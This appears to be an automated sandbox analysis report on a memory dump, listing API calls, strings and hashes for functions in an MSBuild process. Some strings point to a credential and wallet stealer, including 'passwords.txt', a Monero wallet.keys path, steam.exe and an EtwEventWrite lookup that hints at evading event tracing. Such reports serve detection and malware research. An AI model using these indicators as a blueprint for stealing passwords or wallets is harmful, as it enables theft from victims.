                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memset
                                                            • String ID: ERROR_RUN_EXTRACTOR$v10$v20
                                                            • API String ID: 2102423945-380572819
                                                            • Opcode ID: c583a5af4eabbf2f1e55903ac08c2fc38dd49fb6c7cace8cd31f54493459c540
                                                            • Instruction ID: 4271a2f96582835c92d1499e44d2f9be6f2f81c30510370fac18fcb9411d570f
                                                            • Opcode Fuzzy Hash: c583a5af4eabbf2f1e55903ac08c2fc38dd49fb6c7cace8cd31f54493459c540
                                                            • Instruction Fuzzy Hash: 5541B3B2A00108ABCF10DFA5CD42ADE7BB8AB84714F15413BFD40F7280EB78D9458B99
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s
                                                            • String ID: TxA$block
                                                            • API String ID: 3330995566-2373637923
                                                            • Opcode ID: 0968e0b0628705e8ac1d29d17911e38a67c685f80fe145dba11dcdbcfe66eece
                                                            • Instruction ID: 9e2abf34b02cddae1b0fa04c6dc88f1d30775994422634f8dc56bb1647053282
                                                            • Opcode Fuzzy Hash: 0968e0b0628705e8ac1d29d17911e38a67c685f80fe145dba11dcdbcfe66eece
                                                            • Instruction Fuzzy Hash: 7B414F70A48306BBEB44DF60DC49E9A7B6CFB1870BB206166E402D2151FB39B781DB58
                                                            APIs
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0041009A
                                                              • Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED2D
                                                              • Part of subcall function 0042ED18: __CxxThrowException@8.LIBCMT ref: 0042ED42
                                                              • Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED53
                                                            • __EH_prolog3_catch.LIBCMT ref: 00410139
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0041014D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
                                                            • String ID: vector<T> too long
                                                            • API String ID: 2448322171-3788999226
                                                            • Opcode ID: 1419926136d60580067ac53f468ac34c9755c723ec9afb86ab4f57807058201c
                                                            • Instruction ID: 755d422b0406570ec1b1ca0bb8a9fc170e0e76cf90744f0537cefae681ccfb55
                                                            • Opcode Fuzzy Hash: 1419926136d60580067ac53f468ac34c9755c723ec9afb86ab4f57807058201c
                                                            • Instruction Fuzzy Hash: 6331B632B503269BDB18EF69AC456EE77E29705311F51106FE520E7290D6BE9EC08B88
                                                            APIs
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040F282
                                                              • Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED2D
                                                              • Part of subcall function 0042ED18: __CxxThrowException@8.LIBCMT ref: 0042ED42
                                                              • Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED53
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040F28D
                                                              • Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
                                                              • Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
                                                              • Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                            • String ID: invalid string position$string too long
                                                            • API String ID: 1823113695-4289949731
                                                            • Opcode ID: be79a2a7e9aaca69112733cb54712ed9ea9badf19c2d7797a33f7b9a263133be
                                                            • Instruction ID: 277dc4e046663c8ecaa9b12b995e3b45fe52676ed53db3f7bdcff30859ae9fca
                                                            • Opcode Fuzzy Hash: be79a2a7e9aaca69112733cb54712ed9ea9badf19c2d7797a33f7b9a263133be
                                                            • Instruction Fuzzy Hash: 31D0C2B565020CBBCB04E7AAE8069CDB6E89F48700F20016BE700E3241EA7456004559
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00411D73
                                                            • wsprintfW.USER32 ref: 00411D84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocProcesswsprintf
                                                            • String ID: %hs
                                                            • API String ID: 659108358-2783943728
                                                            • Opcode ID: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
                                                            • Instruction ID: 516a0af99a9d3ed9a850d6bfca40a0a85ae49b58000b6b42a5d70a6c01262027
                                                            • Opcode Fuzzy Hash: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
                                                            • Instruction Fuzzy Hash: F2D0A73134031477C61027D4BC0DF9A3F2CDB067A2F001130FA0DD6151C96548144BDD
                                                            APIs
                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00401416
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CapsCreateDeviceRelease
                                                            • String ID: DISPLAY
                                                            • API String ID: 1843228801-865373369
                                                            • Opcode ID: 6d8e34817c800d656530c1e8e523df0c20ac1b926281776ce52baa48a7045e34
                                                            • Instruction ID: 36e3823ee53bced430e70f0d048e6716cdaf6b37fc8da0c0fd181c1dc0393a61
                                                            • Opcode Fuzzy Hash: 6d8e34817c800d656530c1e8e523df0c20ac1b926281776ce52baa48a7045e34
                                                            • Instruction Fuzzy Hash: A5D012353C030477E1781B54BC5FF1A3934D7C9F02F201164F311680E046E41402973E
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
                                                            • GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: EtwEventWrite$ntdll.dll
                                                            • API String ID: 1646373207-1851843765
                                                            • Opcode ID: 5e51bf90e60cb14d8bd058217a4af9c92f753a1577894b23d64cda725500b0c0
                                                            • Instruction ID: b010eca93dcea5ac8893ac9cbd630a9a56b58122e1a4efb0db09dbf7787f5420
                                                            • Opcode Fuzzy Hash: 5e51bf90e60cb14d8bd058217a4af9c92f753a1577894b23d64cda725500b0c0
                                                            • Instruction Fuzzy Hash: F9B09260B803019BDE186B716F9DB8636786B64B067987262A18AD01B0D7BC8024961E
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DecodePointer__getptd_noexit__lock_siglookup
                                                            • String ID:
                                                            • API String ID: 2847133137-0
                                                            • Opcode ID: 566fb7a9ce621392c45170995ac80ea6371b7fc17e128289bbc3db9a78952912
                                                            • Instruction ID: 163363832fae9a4e463df0ece09c03a68562d95583d470f652ab41388aeef822
                                                            • Opcode Fuzzy Hash: 566fb7a9ce621392c45170995ac80ea6371b7fc17e128289bbc3db9a78952912
                                                            • Instruction Fuzzy Hash: 01416D70F00B25CBCB24DF69E8845AEB7B0AB45355BA4512BE801A7391C7B89841CB6C
                                                            APIs
                                                            • malloc.MSVCRT ref: 0041BED8
                                                            • _memmove.LIBCMT ref: 0041BEEC
                                                            • _memmove.LIBCMT ref: 0041BF39
                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,0041AF7E,?,00000001,?,?,?), ref: 0041BF58
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memmove$FileWritemalloc
                                                            • String ID:
                                                            • API String ID: 803809635-0
                                                            • Opcode ID: 081153dacd6338b17544171e625a01bba3250c1498290e89897b4e19aa5d6555
                                                            • Instruction ID: ab02847f2cf5829e892bba1cb09279ef8e0d79e99e6af2a88f0bb91435c9bab5
                                                            • Opcode Fuzzy Hash: 081153dacd6338b17544171e625a01bba3250c1498290e89897b4e19aa5d6555
                                                            • Instruction Fuzzy Hash: F7316A72600704AFD721CF55D980AA7B7F8FB48700F40892EE986C7A40DB74F9458F98
                                                            APIs
                                                            • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7
                                                              • Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
                                                              • Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _memmove_memset
                                                            • String ID: passwords.txt$pe
                                                            • API String ID: 3555123492-1761351166
                                                            • Opcode ID: 724b19f77cfbadd78dc1faf4d27645deae132dfd84264f190695712cfec16b52
                                                            • Instruction ID: f290e10536fc29165bd90020ec0e89fb1ec55b4f39b8cd3f3e59d108c05ab857
                                                            • Opcode Fuzzy Hash: 724b19f77cfbadd78dc1faf4d27645deae132dfd84264f190695712cfec16b52
                                                            • Instruction Fuzzy Hash: 4A71A331500215ABCF15EFA1ED4DD9E3BBAEF4830AF101015F901A31A1EB7A5A55CBA6
                                                            APIs
                                                            • _memset.LIBCMT ref: 00401ADC
                                                              • Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
                                                              • Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateObjectSingleThreadWait_memset
                                                            • String ID: .keys$\Monero\wallet.keys
                                                            • API String ID: 3287460435-3586502688
                                                            • Opcode ID: cf161e074d62e690d0b94438d2b7b7274b7aef0c457231e342b3ec309f2517bf
                                                            • Instruction ID: 2364c372bad150323d67af03c4d359b51cc93a95bd900eacfe79e48eddbf336c
                                                            • Opcode Fuzzy Hash: cf161e074d62e690d0b94438d2b7b7274b7aef0c457231e342b3ec309f2517bf
                                                            • Instruction Fuzzy Hash: 13515EB1E5011D9BCF11EB25DD466DD7379AF04308F1050BAB60873191DA78AFC98F48
                                                            APIs
                                                            • _memset.LIBCMT ref: 00412CDF
                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateProcess_memset
                                                            • String ID: .exe
                                                            • API String ID: 1177741608-4119554291
                                                            • Opcode ID: 6e479dc581881d65200dc593a30c3e623ce6e850db41571400e5ac604b80adaf
                                                            • Instruction ID: 607805de85d34077ac8010c86c96324dc0739edf941e59843d4d701679f3259e
                                                            • Opcode Fuzzy Hash: 6e479dc581881d65200dc593a30c3e623ce6e850db41571400e5ac604b80adaf
                                                            • Instruction Fuzzy Hash: A3417372E00109BBDF11FBA6ED42ACE7775AF44308F510076F500B7191DAB86E8A8BD9
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s
                                                            • String ID: xA
                                                            • API String ID: 3330995566-34346596
                                                            • Opcode ID: b01048b4caaf2d781f6d9571aa0d0e9d3a4acf772d059dc07aa8dac5df416a25
                                                            • Instruction ID: 735330a1d008a833b374886be4d947a81621c86a210c44f2da093846d2bcbd8c
                                                            • Opcode Fuzzy Hash: b01048b4caaf2d781f6d9571aa0d0e9d3a4acf772d059dc07aa8dac5df416a25
                                                            • Instruction Fuzzy Hash: 64319671E001099FCB14DF68CC85BAA77A8BB08717F51505BEC05DA191EB7CCB818B4C
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s
                                                            • String ID: yA
                                                            • API String ID: 3330995566-454502181
                                                            • Opcode ID: 0a5a2c7c2122c5fde08efb15dbd5b8a7581154b05120f6610f4b5857c0dd4555
                                                            • Instruction ID: e25e2a4fac4fdaa3031c2764c7a521eb05de7460a47cf09186ea45e794858a97
                                                            • Opcode Fuzzy Hash: 0a5a2c7c2122c5fde08efb15dbd5b8a7581154b05120f6610f4b5857c0dd4555
                                                            • Instruction Fuzzy Hash: D6219571D00109BFCB18DF64C881ADABBADFF18705F11905BE809EB251E774DB858B98
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s
                                                            • String ID: 2yA
                                                            • API String ID: 3330995566-663247701
                                                            • Opcode ID: ab0f24262003b4c6fdb1df3be14b33564e9d911830fd1b95aa49f2419afa3619
                                                            • Instruction ID: 530b5b9384520956d988ef5f9eef14088f7e00acaaf5feba0a58aa85cdec459f
                                                            • Opcode Fuzzy Hash: ab0f24262003b4c6fdb1df3be14b33564e9d911830fd1b95aa49f2419afa3619
                                                            • Instruction Fuzzy Hash: 74118171900115AFDB01DF54C945BDAB7BCBF1430AF119067E805EB192EB78EF988B98
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xinvalid_argument_memmovestd::_
                                                            • String ID: string too long
                                                            • API String ID: 256744135-2556327735
                                                            • Opcode ID: 5bd3c72e2a2c28d7f98c1eadb8a5e2855416913c1cc93355d95e2efce2546025
                                                            • Instruction ID: b8e333327a8be3efb5a61452340683a7f3e77127bc94f8cc85e467c2da99d15f
                                                            • Opcode Fuzzy Hash: 5bd3c72e2a2c28d7f98c1eadb8a5e2855416913c1cc93355d95e2efce2546025
                                                            • Instruction Fuzzy Hash: B611A375300201ABDB24DF2DD941929B369FF85354714413FF801ABBC2C779ED69C69A
                                                            APIs
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040F13E
                                                              • Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
                                                              • Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
                                                              • Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0
                                                              • Part of subcall function 0040F238: std::_Xinvalid_argument.LIBCPMT ref: 0040F242
                                                            • _memmove.LIBCMT ref: 0040F190
                                                            Strings
                                                            • invalid string position, xrefs: 0040F139
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                            • String ID: invalid string position
                                                            • API String ID: 3404309857-1799206989
                                                            • Opcode ID: 11bcbbf4e3385ff2571c5c45c4b2439a3f96e274cabb5125d6892df765bbcaf0
                                                            • Instruction ID: 943bf7d0d5a8fabe028b1a780fc3b1132d50164a8b8b874ee1f3eb6896142e72
                                                            • Opcode Fuzzy Hash: 11bcbbf4e3385ff2571c5c45c4b2439a3f96e274cabb5125d6892df765bbcaf0
                                                            • Instruction Fuzzy Hash: 0611E131304210EBDB24DE6CD9809697365AF45324744067BF815EFAC2C33CED458B9A
                                                            APIs
                                                            • std::_Xinvalid_argument.LIBCPMT ref: 0040F35C
                                                              • Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
                                                              • Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
                                                              • Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0
                                                            • memmove.MSVCRT(0040EEBE,0040EEBE,C6C68B00,0040EEBE,0040EEBE,0040F15F,?,?,?,0040F1DF,?,?,?,74DF0440,?,-00000001), ref: 0040F392
                                                            Strings
                                                            • invalid string position, xrefs: 0040F357
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                            • String ID: invalid string position
                                                            • API String ID: 1659287814-1799206989
                                                            • Opcode ID: 8d6f190ab6b2ba40715b33eca56b8a5e9ffc43c45ee1a123cf25a47b4358ef61
                                                            • Instruction ID: af76378122cbc654785c4284bc1f2564db1dd501434687a4ca840133f71d0007
                                                            • Opcode Fuzzy Hash: 8d6f190ab6b2ba40715b33eca56b8a5e9ffc43c45ee1a123cf25a47b4358ef61
                                                            • Instruction Fuzzy Hash: 4601AD713107418BD7348E7899C491FB2A2EB85B20730493ED982D7B85DB7CE84E8798
                                                            APIs
                                                            • strcpy_s.MSVCRT ref: 004282FE
                                                            • __invoke_watson.LIBCMT ref: 00428352
                                                              • Part of subcall function 0042818D: _strcat_s.LIBCMT ref: 004281AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __invoke_watson_strcat_sstrcpy_s
                                                            • String ID: ,NC
                                                            • API String ID: 1132195725-1329140791
                                                            • Opcode ID: 6e4e6a371cba90ef9ebeeb0ca97326c2cbf7688855193e91cf68080b76189653
                                                            • Instruction ID: 9fd3745167120440bfdedbbf8520646eac0ac106fd9ee082a2a4634a1cd760c1
                                                            • Opcode Fuzzy Hash: 6e4e6a371cba90ef9ebeeb0ca97326c2cbf7688855193e91cf68080b76189653
                                                            • Instruction Fuzzy Hash: 9EF0F4725412187FDB116EA09C43EEF3B5AAF00354F88805AFD1886191DA379D60C754
                                                            APIs
                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 004124B2
                                                            • CloseHandle.KERNEL32(00000000), ref: 00412521
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseH_prolog3_catch_Handle
                                                            • String ID: steam.exe
                                                            • API String ID: 860495366-2826358650
                                                            • Opcode ID: 1e05f0965f72d128c620ac0fa61a73bdd70f09bb6f681c8712c2487e80381a4f
                                                            • Instruction ID: a3cdee16b5dfd04d3bd918c7eedd9f2c5ccf5c1b7225a83da59ac7103b0bc528
                                                            • Opcode Fuzzy Hash: 1e05f0965f72d128c620ac0fa61a73bdd70f09bb6f681c8712c2487e80381a4f
                                                            • Instruction Fuzzy Hash: 81012170A01224DFDB60DB64DD45BDE77B9AF09311F4011E6E409E2290EB398B81CB25
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __invoke_watson_strcat_s
                                                            • String ID: `8C
                                                            • API String ID: 228796091-1339866851
                                                            • Opcode ID: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
                                                            • Instruction ID: d641333d3b05eb37c220185af6f0ca3676d28bda76794771061db1e67d1cdd83
                                                            • Opcode Fuzzy Hash: d2307989adf0da250e0c2039779c175f09f7b7af11d147463b8ee5fd369ca3e3
                                                            • Instruction Fuzzy Hash: D9E09273601219ABDB111E56EC419EF7719FFC0368B45043AFD1852001DB3699A29694
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: NameName::
                                                            • String ID: {flat}
                                                            • API String ID: 1333004437-2606204563
                                                            • Opcode ID: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
                                                            • Instruction ID: 71cdc5086ad98bd25e234238e95b4002ba9000919263a4584fe9e931f4e7c874
                                                            • Opcode Fuzzy Hash: c0aecf38d8767bf2edb4203e1a237864f4bfc1262168b0dc7fac00c370597be1
                                                            • Instruction Fuzzy Hash: 84F0A031144208AFCB10EF58D415BE53BA1AF4575AF08805AF94C4F393D774E8C2C799
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus_memset
                                                            • String ID: @
                                                            • API String ID: 587104284-2766056989
                                                            • Opcode ID: 7d61576bc23e6c09f31e39ad3bd34650203f811b8cd45cb545fdcfe0ae16857c
                                                            • Instruction ID: 7279cf6f1f22d2a2ba8e3215006abc5fc6e9ec8f7915935b92b5a6e75ca34a4d
                                                            • Opcode Fuzzy Hash: 7d61576bc23e6c09f31e39ad3bd34650203f811b8cd45cb545fdcfe0ae16857c
                                                            • Instruction Fuzzy Hash: 8EE0E0F1D1020C9BDB14DFA5E946F5DB7F89B04704F5000299A05E7181E678BB098B59